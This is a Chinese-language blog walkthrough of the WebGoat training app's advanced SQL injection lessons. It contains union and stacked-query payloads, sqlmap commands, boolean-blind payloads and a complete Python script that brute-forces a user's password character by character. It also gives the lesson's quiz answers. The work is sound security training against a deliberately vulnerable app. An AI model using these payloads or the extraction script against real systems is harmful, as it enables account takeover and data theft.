WebGoat (A1) SQL Injection (advanced)

目录

一、仙女的闯关

第3页

第一种 联合查询(union)注入

第二种 堆叠注入(query chaining)

第5页

第6页

二、课程思维图


一、仙女的闯关

第3页

这页已知Name框有SQL注入漏洞,要求得到user_system_data整表数据。Password框在注入的时候没用,就是用来检测注入得到的Dave的密码对不对的。

提示了可以用联合查询(union)注入,或者堆叠注入(query chaining)。

第一种 联合查询(union)注入

Name框输入:

Dave' union select userid,user_name,password,cookie,'5','6',7 from user_system_data-- ss

按Get Account Info按钮提交

WebGoat (A1) SQL Injection (advanced)_第1张图片

第二种 堆叠注入(query chaining)

Name框输入:

1';select * from user_system_data-- ss

按Get Account Info按钮提交

WebGoat (A1) SQL Injection (advanced)_第2张图片

第5页

这页要求以Tom的身份登录。

这页可以进行两种操作,一种是LOGIN,另一种是REGISTER。

先来LOGIN。我用用户名Tom,密码ford,进行了登录操作(✿◡‿◡)

WebGoat (A1) SQL Injection (advanced)_第3张图片

显然是登录不了的,不过现在做这个登录操作仅仅是为了抓包而已。

burpsuite的proxy模块抓到了下面这样的报文,右键copy to file保存为advance_p5_login.txt。

WebGoat (A1) SQL Injection (advanced)_第4张图片

然后来REGISTER。

注册了个lily(别问,问就是pikachu后遗症(~ ̄▽ ̄)~)

WebGoat (A1) SQL Injection (advanced)_第5张图片

burpsuite的proxy模块抓到了下面这样的报文,右键copy to file保存为advance_p5_register.txt。

WebGoat (A1) SQL Injection (advanced)_第6张图片

然后,祭出大杀器sqlmap。

首先检查一下LOGIN页面有没有注入点,cmd窗口输入如下命令

python2 sqlmap.py -r "E:\渗透测试学习资料\webgoat\A1_SQL注入\advance_p5_login.txt"

结果没有发现注入点

不灰心,还有REGISTER页面,cmd窗口输入如下命令

python2 sqlmap.py -r "E:\渗透测试学习资料\webgoat\A1_SQL注入\advance_p5_register.txt"

开心,找到注入点了,注入点是username_reg,也就是REGISTER页面的Username框。

WebGoat (A1) SQL Injection (advanced)_第7张图片

并且还提供了三种可行的注入方法:boolean-based blind(布尔盲注)、stacked queries(堆叠注入)、time-based blind(时间盲注)。

那盲注就想到可以读取Tom的个人信息,堆叠注入就想到可以修改Tom的密码。

其实想用堆叠注入修改Tom的密码的话,还是得先知道表名和列名,所以由于这题只是要求用Tom的身份登录,所以还是用布尔盲注比较好。

 

用sqlmap获取Tom的个人信息:

cmd窗口输入

python2 sqlmap.py -r "E:\渗透测试学习资料\webgoat\A1_SQL注入\advance_p5_register.txt" --current-db

得到当前数据库PUBLIC(本来想用--dbs参数把databases全都爆出来,结果似乎没权限)

cmd窗口输入

python2 sqlmap.py -r "E:\渗透测试学习资料\webgoat\A1_SQL注入\advance_p5_register.txt" --tables -D PUBLIC --technique B

--technique可以指定用哪种注入方法,我这边指定的是布尔盲注(这题时间盲注太慢了,而且结果是个奇怪的东西)

爆出3个奇奇怪怪的表(时间盲注出来的结果也是个类似的东西)

然后用下面这个命令企图爆出表的列名,结果没有爆出来(三个表都试了)

python2 sqlmap.py -r "E:\渗透测试学习资料\webgoat\A1_SQL注入\advance_p5_register.txt" --columns -D PUBLIC -T \n\n\n\n\n\n\n\n\n

看来只能手工注入了。

首先要了解一下查询结果为真和为假的时候,页面返回有何不同

首先看结果为真的情况:

构造payload:username_reg=lily' and 1=1-- ss

如下图可见,结果返回already exists

WebGoat (A1) SQL Injection (advanced)_第8张图片

再来看结果为假的情况:

构造payload:username_reg=lily' and 1=2-- ss

如下图可见,结果返回created

WebGoat (A1) SQL Injection (advanced)_第9张图片

一开始我想试试通过正经方法爆表爆列爆数据,一路爆过去,但是第一步就卡住了。如下图所示,爆表的时候就返回"Something went wrong",应该是sql语句不合法了。

后来又试了下面几种payload,还是报"Something went wrong":

(1)username_reg=lily' and length(select 1 from INFORMATION_SCHEMA.TABLES where TABLE_SCHEMA='PUBLIC')>1-- ss

(2)username_reg=lily' and length(select 1 from INFORMATION_SCHEMA.TABLES where TABLE_SCHEM='PUBLIC')>1-- ss

(3)username_reg=lily' and length(select 1 from INFORMATION_SCHEMA.SYSTEM_TABLES where TABLE_SCHEMA='PUBLIC')>1-- ss

(4)username_reg=lily' and length(select 1 from INFORMATION_SCHEMA.SYSTEM_TABLES where TABLE_SCHEM='PUBLIC')>1-- ss

WebGoat (A1) SQL Injection (advanced)_第10张图片

那就只好用不正经的方法了。。

这边既然能区分用户有没有被创建过,就应该有个select语句从某个表里面按照用户名进行查找,如果这个表里面正好也有用户的密码,岂不就可以直接猜测用户密码了?

根据以上的分析,这种情况要依次满足三个条件:

(1)查询用户是否创建的表中正好有用户密码

(2)知道用户名

(3)知道密码所在列名

第一个条件实打实碰运气;

第二个条件也要靠猜,但是已经给提示本人名叫Tom了,应该比较好猜。在Register页面通过注册用户猜测,如果猜对了应该会返回already exists,如果猜错了应该会返回created;

第三个条件根据上述经验,可以猜测密码所在列名,如果列名不对,估计会返回Something went wrong,如果列名正确,返回结果可能是already exists或者created。

先来猜用户名,先试试注册Tom:

返回如下图,是created,表示Tom注册的用户名不是Tom

WebGoat (A1) SQL Injection (advanced)_第11张图片

再试试tom(如果怕不区分大小写不放心,可以reset lesson再尝试,或者试完tom再试一下TOM):

返回如下图所示,already exists,表示Tom注册的用户名是tom。

WebGoat (A1) SQL Injection (advanced)_第12张图片

现在可以开始猜密码列名是什么了:

length(列名)>0一定是TRUE,再根据上面的分析,如果列名猜对了,会返回already exists,如果猜错了,估计会返回Something went wrong。

从POST参数来看,先猜密码的列名是password。

构造payload:username_reg=tom' and length(password)>0-- ss

返回了already exists,说明猜对了。

WebGoat (A1) SQL Injection (advanced)_第13张图片

可以把password改成password0来确认一下确实猜对了:

返回结果如下,和预想的一样

WebGoat (A1) SQL Injection (advanced)_第14张图片

知道了密码列名,就可以用burpsuite的intruder模块先爆破密码长度,再一位一位爆破密码

爆破密码长度:

如下面两张图这样在burpsuite的intruder设置:

简单来说用的payload是:username_reg=tom' and length(password)=x-- ss,其中x是要爆破的数字。

WebGoat (A1) SQL Injection (advanced)_第15张图片

WebGoat (A1) SQL Injection (advanced)_第16张图片

按start attack开始爆破,结果按length排个序,发现密码有23位。。。

WebGoat (A1) SQL Injection (advanced)_第17张图片

下面开始爆破密码:

考虑到密码长度有23位,而且有可能包含数字、大小写字母、特殊字符,因此我觉得就算用burpsuite进行半手工爆破,也要累死我,所以写了个python脚本,来实现tom的密码爆破。

需要的话可以直接拷贝下面的代码,记得headers中的Cookie的值要改成自己登录之后抓到的请求报文中的cookie值

import requests


url = "http://192.168.101.16:8222/WebGoat/SqlInjectionAdvanced/challenge"
headers={ "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36","Cookie": "JSESSIONID=VjGdZj9IvzWQ9BJFIEar2--CEun-GVI0GnBVU7nE",}
 
keylist = [chr(i) for i in range(33, 127)]                                     #包括数字、大小写字母、特殊字符
answer = ''

for i in range(1,24):
    for c in keylist:
        payload = "tom' and substring(password,"+str(i)+",1)='"+c+"'-- ss"     #用substring逐位猜测密码
        formdata = {
        "username_reg":payload,
        "email_reg":"[email protected]",
        "password_reg":"12",
        "confirm_password_reg":"12",
        }
        response = requests.put(url, data = formdata, headers = headers)
        if response.text.find("already exists") != -1:                         #猜对了的话返回结果会包含already exists
            answer = answer+c
            break
print(answer)                                                                  #打印结果     

这脚本得跑一会儿,跑完会打印出密码:thisisasecretfortomonly

用户名tom,密码thisisasecretfortomonly,登录成功

WebGoat (A1) SQL Injection (advanced)_第18张图片

题外话:

上述过程中还发现个小bug(v8.1.0版本),在登录页面只要用注册过的用户登录(比如lily),用户名和密码输入正确,页面数字的小框框就会从红变绿:

WebGoat (A1) SQL Injection (advanced)_第19张图片

可能是因为代码中只要登录时用户名和密码输入正确就success(this)了(56~58行):

WebGoat (A1) SQL Injection (advanced)_第20张图片

AttackResult的定义在 WebGoat-8.1.0\webgoat-container\src\main\java\org\owasp\webgoat\assignments\AttackResult.java

第6页

这页是个quiz,答案见下图

WebGoat (A1) SQL Injection (advanced)_第21张图片

WebGoat (A1) SQL Injection (advanced)_第22张图片

二、课程思维图

WebGoat (A1) SQL Injection (advanced)_第23张图片

你可能感兴趣的:(WebGoat,#,注入,网络安全,python,java,hsqldb,sql)